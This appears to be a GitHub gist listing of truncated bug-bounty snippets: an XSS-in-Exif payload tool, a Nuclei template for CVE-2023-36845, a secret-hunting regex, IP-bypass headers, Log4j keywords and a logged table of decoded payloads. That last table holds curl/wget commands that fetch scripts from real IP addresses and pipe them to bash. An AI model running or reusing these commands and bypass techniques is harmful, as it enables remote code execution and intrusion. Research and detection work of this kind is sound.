Nuclei Templates
0xbloody
mhmdiaa
/ httpx-cp-responses.sh
Created
April 30, 2024 21:09
Copy responses from httpx's output to their original file names
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cat urls.txt | httpx -json -store-response -output httpx.json | |
| cat httpx.json | jq -r '"\(.stored_response_path) \(.path | ltrimstr("/"))"' | xargs -n 2 sh -c 'mkdir -p "$(dirname $2)" && cp $1 $2' sh |
0xbloody
/ exifxss.py
Created
December 5, 2023 17:30
— forked from hash3liZer/exifxss.py
Embedding XSS payloads in the Exif Metadata fields of and image
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import subprocess | |
| exifs = [ | |
| "ImageDescription", | |
| "Make", | |
| "Model", | |
| "Software", | |
| "Artist", | |
| "Copyright", |
hxlxmj
/ CVE-2023-36845.yaml
Created
September 20, 2023 04:15
Nuclei Template For Juniper Networks Junos OS PHP External Variable Modification Vulnerability
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2023-36845 | |
| info: | |
| name: Juniper Networks Junos OS PHP External Variable Modification Vulnerability | |
| author: hxlxmj | |
| severity: medium | |
| description: | | |
| A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables. | |
| reference: | |
| - https://nvd.nist.gov/vuln/detail/CVE-2023-36845 |
ruevaughn
/ 1_top+hacker_methodologies.md
Last active
April 2, 2025 17:36
Hacker Methodologies & Tools (NEW)
h4x0r-dz
/ Generic keys
Created
May 5, 2022 09:15
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
Softanics
/ gist:46f385d3c11c12f6f6b1c25709393fb9
Created
January 21, 2022 12:55
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Program | |
| // Token: 0x0600000B RID: 11 RVA: 0x00002E78 File Offset: 0x00001078 | |
| public unsafe static string AssemblyReferenceDependentAssemblySizeMiddleEastFrench(byte[] data) | |
| { | |
| int num = 1; | |
| int num2 = num; | |
| int num3 = num2 * 4; | |
| int num4 = num2 * 8; | |
| byte[] array = new byte[4]; | |
| object[] array2 = new object[4]; |
Anon-Exploiter
/ gist:2b6d8a98a8932061d9aa6238b27b047b
Created
December 29, 2021 09:59
— forked from kaimi-/gist:6b3c99538dce9e3d29ad647b325007c1
Possible IP Bypass HTTP Headers
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CACHE_INFO: 127.0.0.1 | |
| CF_CONNECTING_IP: 127.0.0.1 | |
| CF-Connecting-IP: 127.0.0.1 | |
| CLIENT_IP: 127.0.0.1 | |
| Client-IP: 127.0.0.1 | |
| COMING_FROM: 127.0.0.1 | |
| CONNECT_VIA_IP: 127.0.0.1 | |
| FORWARD_FOR: 127.0.0.1 | |
| FORWARD-FOR: 127.0.0.1 | |
| FORWARDED_FOR_IP: 127.0.0.1 |
pikpikcu
/ JavascriptRecon.md
Created
December 21, 2021 05:51
My Javascript Recon Process - BugBounty
bugbountynights
/ log4j-keywords
Last active
September 7, 2024 08:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ${ctx:loginId} | |
| ${map:type} | |
| ${filename} | |
| ${date:MM-dd-yyyy} | |
| ${docker:containerId} | |
| ${docker:containerName} | |
| ${docker:imageName} | |
| ${env:USER} | |
| ${event:Marker} | |
| ${mdc:UserId} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| b64decoded | hits | |
|---|---|---|
| (curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash | 2056 | |
| (curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash | 162 | |
| (curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash | 2 |
NewerOlder